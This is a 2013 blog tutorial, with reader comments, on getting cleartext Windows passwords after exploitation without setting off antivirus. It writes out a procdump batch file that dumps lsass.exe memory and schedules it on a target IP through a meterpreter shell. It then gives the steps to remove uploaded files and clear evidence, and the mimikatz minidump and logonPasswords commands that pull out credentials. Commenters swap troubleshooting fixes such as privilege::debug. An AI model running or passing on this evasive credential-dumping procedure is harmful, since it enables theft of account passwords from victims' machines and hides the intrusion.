Friday, August 16, 2013

Mimikatz alpha to get clear text password via bat file without AV alert.


Mimikatz is great tool to get cleat text password . it extract password from memory. If you want to use ; here is my previous tutorial . Also it include now in metasploit. But now most of Antivirus  detect it. So now we use another method to get clear text password using mimikatz alpha.

(1)It`s post exploitation method ;so first you have to get meterpreter session using metasploit. If you are new ; then visit metasploit section of blog. You also need admin access of box. So for that you can use bypassuac module of metasploit.

(2)First  download latest  mimikatz which contain alpha version of it from following link.
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z

Then download process dump from following link
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

(3)Now make one batch file name it to procdump.bat . paste following code into batch file.

@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\dump_file.dmp 2>&1

(4)Now from meterpreter session upload  procdump.bat & downloaded  procdump.exe file to C:\windows\temp folder.

(5)Now go to shell from meterpreter & if you are not in temp directory change it to the C:\windows\temp
Now here what we do is create scheduled task.So type following command in shell.

at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat

mimikatz

Here 192.168.1.3 is target i.p. & 20:55 is time to execute procdump batch file.
So what this batch file do. It create process dump file using procdump.exe. 

(6)Now download dump_file.dmp from temp folder ; then remove uploaded file from folder & clear ev.

We have process dump file ; so we can extract password from this file using minidump .But only one requirement is we should running mimikatz on same version & architecture from where we pull.

mimikatz-1

(7)Now extract mimikatz zip file which we download in first step.
Go to folder alpha & then according to your victim o.s and put dump_file.dmp in that folder.

(8)Open mimikatz.exe from cmd which is in folder alpha/win32 & type following command.
sekurlsa::minidump dump_file.dmp


mimikatz-2

(9)It`s final step type this command in cmd.
sekurlsa::logonPasswords

mimikatz-3

Disadvantage of this process is size of dump file . In my case it`s 25 m.b ; but it depend on running process.
Now you have all credential of victim in clear text.If you face any difficulty you can mention in comment.


7 comments:

Unknown said...

i tried the above but it keeps displaying ERROR

mimikatz # sekurlsa::logonPasswords full
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005

please help me ?

nirav desai said...

First i assume that you have enough privilege , and then one requirement is we should running mimikatz on same version & architecture from where we pull.View second image of post for compatible issue. @Ammar Hashim

Unknown said...

I get the following error
sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed

please help

rasheed said...

i tried the above but it keeps displaying ERROR

mimikatz # sekurlsa::logonPasswords full
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005

how to get sysytem level priv from cmd?

smallwater said...

Run in administrator
Then : privilege::debug
Then : sekurlsa::logonPasswords

Unknown said...

Use "privilege::debug" before using your command.

Unknown said...

is it possible to use such procdump script on windows? if so with which command?

Post a Comment

UA-35960349-1